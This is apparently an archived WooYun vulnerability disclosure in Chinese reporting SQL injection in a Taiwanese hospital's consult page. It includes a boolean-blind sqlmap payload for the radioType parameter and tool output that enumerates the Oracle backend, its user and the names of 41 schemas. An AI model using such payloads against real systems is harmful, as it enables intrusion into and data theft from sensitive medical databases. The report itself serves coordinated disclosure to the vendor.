乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
亞東紀念醫院www站点sql注入(Oracle注入/涉及41库)
注入点:
http://**.**.**.**/consult/consult.aspx?Action=2&radioType=0401
布尔型注入好快
Place: GETParameter: radioType Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Action=2&radioType=0401' AND 6064=6064 AND 'nDCF'='nDCF---[14:52:22] [INFO] testing MySQL[14:52:22] [WARNING] the back-end DBMS is not MySQL[14:52:22] [INFO] testing Oracle[14:52:23] [INFO] confirming Oracle[14:52:24] [INFO] the back-end DBMS is Oracleweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.back-end DBMS: Oracle[14:52:24] [INFO] fetching current user[14:52:24] [WARNING] running in a single-thread mode. Please consider usption '--threads' for faster data retrieval[14:52:24] [INFO] retrieved: WEB_AP01current user: 'WEB_AP01'
41个裤子,啥也不说了 表不跑了 这么多裤 证明一下
[14:56:07] [INFO] retrieved: 41[14:56:23] [INFO] retrieved: APEX_030200[14:59:23] [INFO] retrieved: BACKUP_USER[15:02:15] [INFO] retrieved: BUM[15:03:08] [INFO] retrieved: CDC[15:04:08] [INFO] retrieved: CMI2[15:05:13] [INFO] retrieved: CONSULT[15:07:12] [INFO] retrieved: CTXSYS[15:08:49] [INFO] retrieved: DIET[15:10:09] [INFO] retrieved: EMP[15:10:53] [INFO] retrieved: EXFSYS[15:12:17] [INFO] retrieved: GATEWAY[15:14:02] [INFO] retrieved: GUID[15:15:13] [INFO] retrieved: GUID_AP01[15:17:38] [INFO] retrieved: HEXAM[15:19:04] [INFO] retrieved: HOME[15:20:17] [INFO] retrieved: INTRA[15:21:48] [INFO] retrieved: IPDNURSE[15:23:49] [INFO] retrieved: IWATCH[15:25:49] [INFO] retrieved:.......................................................省略
危害等级:高
漏洞Rank:16
确认时间:2016-01-14 23:22
感謝通報
暂无